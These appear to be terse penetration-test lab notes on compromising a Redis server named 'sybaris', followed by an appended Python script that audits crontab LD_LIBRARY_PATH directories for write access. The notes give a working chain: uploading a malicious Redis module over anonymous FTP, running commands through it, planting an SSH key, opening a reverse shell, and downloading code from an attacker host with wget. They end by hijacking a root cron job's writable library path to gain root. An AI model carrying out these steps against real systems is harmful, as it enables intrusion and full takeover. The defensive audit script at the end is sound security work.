redis is running on port 6379
Using https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#load-redis-module
clone repo, make
FTP anonymous
need to upload the module.so
we can use ftp to upload
Uploaded module.so to ftp pub/
Default path is /var/ftp
Using redis-cli
192.168.224.93:6379> module load /var/ftp/pub/module.so
192.168.224.93:6379> modue list
(error) ERR unknown command `modue`, with args beginning with: `list`,
192.168.224.93:6379> module list
1) 1) "name"
2) "system"
3) "ver"
4) (integer) 1
192.168.224.93:6379> system.exec "whoami;id;hostname;uname -a"
"pablo\nuid=1000(pablo) gid=1000(pablo) groups=1000(pablo)\nsybaris\nLinux sybaris 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux\n"
192.168.224.93:6379>
192.168.224.93:6379> system.exec "mkdir /home/pablo/.ssh"
192.168.224.93:6379> system.exec 'echo "ssh-rsa <<id_rsa.pub>>" > /home/pablo/.ssh/authorized_keys'
[OR]
192.168.224.93:6379> system.rev 192.168.45.225 80
Priv esc
python -c 'import pty; pty.spawn("/bin/bash")'
Enumeration
Writable files outside user's home
/var/tmp
/var/log/redis
/var/log/redis/redis-server.log
/var/spool/mail/pablo
/var/ftp/pub
/var/ftp/pub/module.so
/tmp
/tmp/.X11-unix
/tmp/.font-unix
/tmp/.XIM-unix
/tmp/.Test-unix
/tmp/.ICE-unix
/tmp/lse.sh
/usr/local/lib/dev
[*] sec010 List files with capabilities.................................... yes!
---
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/etc/crontab:SHELL=/bin/bash
/etc/crontab:PATH=/sbin:/bin:/usr/sbin:/usr/bin
/etc/crontab:LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
/etc/crontab:MAILTO=""
/etc/crontab: * * * * * root /usr/bin/log-sweeper
/etc/cron.d/0hourly:SHELL=/bin/bash
/etc/cron.d/0hourly:PATH=/sbin:/bin:/usr/sbin:/usr/bin
/etc/cron.d/0hourly:MAILTO=root
/etc/cron.d/0hourly:01 * * * * root run-parts /etc/cron.hourly
---
[!] ret060 Can we write to executable paths present in cron jobs........... yes!
---
/etc/crontab:LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
export LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
─(jay㉿localhost)-[/opt/Tools/linux_tools/sudo]
wget http://192.168.45.225:22/test.c
gcc -o utils.so -shared -fPIC test.c
./rootbash -p
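Added here as a defender's check, not part of the original notes: the root crontab above sets an LD_LIBRARY_PATH that includes /usr/local/lib/dev, the directory lse listed as writable, which is exactly what made the cron job hijackable. The script below parses LD_LIBRARY_PATH out of a constructed copy of those crontab lines and flags every listed directory that is group- or world-writable; `demo()` builds a throwaway directory tree mirroring the box (constructed, not the real filesystem) so the finding can be reproduced offline.

```python
import os
import stat
import tempfile

# Constructed copy of the crontab lines from the notes (sample input, not /etc/crontab).
SAMPLE_CRONTAB = """SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
MAILTO=""
* * * * * root /usr/bin/log-sweeper
"""


def cron_library_dirs(crontab_text):
    """Return the directories named in LD_LIBRARY_PATH= lines of a crontab, in order."""
    dirs = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if line.startswith("LD_LIBRARY_PATH="):
            value = line.split("=", 1)[1].strip().strip('"')
            dirs.extend(d for d in value.split(":") if d)
    return dirs


def weak_library_dirs(dirs, prefix=""):
    """Map each group- or world-writable directory to a reason string.

    The loader searches these directories before the system defaults, so any
    non-root user who can drop a .so there controls what the root job loads.
    A sticky bit does not help: creating a new file is still allowed.
    `prefix` lets the check run against a test tree instead of / .
    """
    findings = {}
    for d in dirs:
        path = prefix + d
        if not os.path.isdir(path):
            continue  # absent entries are skipped; review their parents separately
        mode = os.stat(path).st_mode
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings[d] = "writable by group/other"
    return findings


def demo():
    """Build a constructed tree mirroring the box and audit it (expects one finding)."""
    root = tempfile.mkdtemp()
    dirs = cron_library_dirs(SAMPLE_CRONTAB)
    for d in dirs:
        os.makedirs(root + d, exist_ok=True)
        os.chmod(root + d, 0o755)  # sane default: root-style, not group/world writable
    os.chmod(root + "/usr/local/lib/dev", 0o777)  # reproduce the weakness lse reported
    return weak_library_dirs(dirs, prefix=root)
```

Run `weak_library_dirs(cron_library_dirs(open("/etc/crontab").read()))` on a live host to audit it; remediation is to drop the directory from LD_LIBRARY_PATH or make it root-owned and 0755.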
594807f3ba85ee342ed58e410ddc1d17
774046bc3830d36dd952f433be656831